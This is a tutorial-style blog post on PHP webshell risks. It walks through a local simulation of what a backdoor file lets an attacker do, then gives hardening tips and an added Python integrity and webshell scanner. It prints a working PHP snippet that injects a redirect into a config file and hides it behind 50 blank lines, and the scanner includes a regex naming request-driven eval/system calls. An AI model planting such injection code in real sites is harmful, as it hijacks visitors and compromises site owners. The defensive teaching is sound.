Today I’m going to talk about server security. Lately I have been working on server attack and defense issues and fixing some vulnerabilities, and when you write code you really need to pay attention to security. Never trust user input! Today I’ll show you the danger hiding in a few lines of PHP code.

Test preparation

To simulate this, I set up a local server environment to show how a normal website can be attacked.

First modify the computer’s local hosts file so that the virtual domain test.com points at the local machine. On Windows the file lives in “C:\Windows\System32\drivers\etc”.

The site directory is simple, as follows:

In the entry file, include the database configuration file and then output a sentence that stands in for the site’s home page.

For the database configuration file, I borrowed the format used by the currently popular ThinkPHP framework: it returns an array of basic database information, including the database port and password.

And then there’s the star of the show: the hacker’s backdoor file.

You might think: is that it? What can you do with a few lines of code?

Start simulating the attack

Let’s visit our website.

The website is accessible without any problems.

Accessing the hacker’s file also seems to cause no problem.

1. Output PHP version information

Now the hacker knows your backend PHP version, which extensions are installed and what database is used.

2. Web page redirection

The page can be redirected to Baidu, which means the hacker has a working code-execution environment: using your website, they can write a line of code and run it.

3. Read the database configuration information

Your database password is already in their hands, and all of your site’s data can be read or modified. Scary. They could even drop the database and run away!!

4. Delete files

Look: the 1.txt file has been deleted.

Next it is your website’s own files that get deleted.

5. Modify the file

<?php
$info   = file_get_contents("Conf/db.php");
$change = str_repeat("\r\n", 50);
// strip the opening tag so it can be put back at the very top
$file   = str_replace("<?php", "", $info);
// any function you want to add can be written below
$extCode = "header('Location: http://www.baidu.com');";
file_put_contents("Conf/db.php", "<?php" . $change . $extCode . $file);

Here is how your db.php file changes:

So many blank lines are added at the top that you think the file is empty, yet a line of redirect code has already been added to it: no matter who visits your site, they get sent to the attacker’s website.

End of the attack

Were you surprised? Don’t panic. How can we guard against it?

  • Don’t trust user input! Don’t trust user input! Don’t trust user input!
  • Filter user input as soon as it is received, before it is used;
  • On the server, set file permissions so that not every file is allowed to execute as a script;
  • Or add a tamper-proofing (file integrity) function;
  • Or adjust your server’s security group: change the default ports 22 and 21, and do not open all ports;
  • Scan the entire site for Trojans (webshells).
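As an added example (not code from the original post), here is a small Python check covering the “tamper-proof” and “scan the whole site” items: it stores a hash baseline so a modified db.php is flagged, and it looks for the exact trick shown above (a run of blank lines after <?php followed by a header() redirect) plus the usual request-driven eval() webshell pattern. The sample file contents are constructed; the Conf/ path prefix and the 50-line padding come from the page, the threshold of 20 blank lines is an assumption.

```python
import hashlib
import re

# Constructed samples: a ThinkPHP-style db config, and the same file after the page's
# trick (50 blank lines, then a redirect, then the original body minus its open tag).
CLEAN_DB_PHP = "<?php\nreturn [\n    'hostname' => '127.0.0.1',\n    'hostport' => '3306',\n];\n"
TAMPERED_DB_PHP = ("<?php" + "\r\n" * 50 + "header('Location: http://www.baidu.com');"
                   + CLEAN_DB_PHP.replace("<?php", "", 1))

PADDING_THRESHOLD = 20  # assumption: a real config file never starts with a screen of blank lines
# Webshell indicator: a code-execution function fed straight from request input.
WEBSHELL_RE = re.compile(r"\b(eval|assert|system|passthru|shell_exec)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b")

def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()

def build_baseline(files: dict[str, str]) -> dict[str, str]:
    """Hash of every known-good file; this is what a tamper-proof check stores."""
    return {path: sha256_hex(content) for path, content in files.items()}

def find_tampered(files: dict[str, str], baseline: dict[str, str]) -> dict[str, str]:
    """Compare the current files with the baseline: added, modified and deleted paths."""
    changes = {path: "deleted" for path in baseline.keys() - files.keys()}
    for path, content in files.items():
        if path not in baseline:
            changes[path] = "added"
        elif sha256_hex(content) != baseline[path]:
            changes[path] = "modified"
    return changes

def leading_blank_lines(content: str) -> int:
    """Count the blank lines directly after the opening <?php tag."""
    body = content.split("<?php", 1)[1] if "<?php" in content else content
    count = 0
    for line in body.splitlines():
        if line.strip():
            break
        count += 1
    return count

def scan_php(path: str, content: str) -> list[str]:
    """Heuristic findings for one PHP file: padding trick, redirect in a config, request-driven eval."""
    findings = []
    if leading_blank_lines(content) >= PADDING_THRESHOLD:
        findings.append("padding-after-open-tag")
    if path.startswith("Conf/") and re.search(r"header\s*\(\s*['\"]Location:", content, re.I):
        findings.append("redirect-in-config")
    if WEBSHELL_RE.search(content):
        findings.append("request-driven-code-execution")
    return findings
```

In practice you would fill the files dict by walking the web root and keep the baseline somewhere the web server cannot write to.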

😜 😜 😜 😜 😜 😜 😜

I wish you a happy life, study hard, and resist all malicious attacks!

😜 😜 😜 😜 😜 😜 😜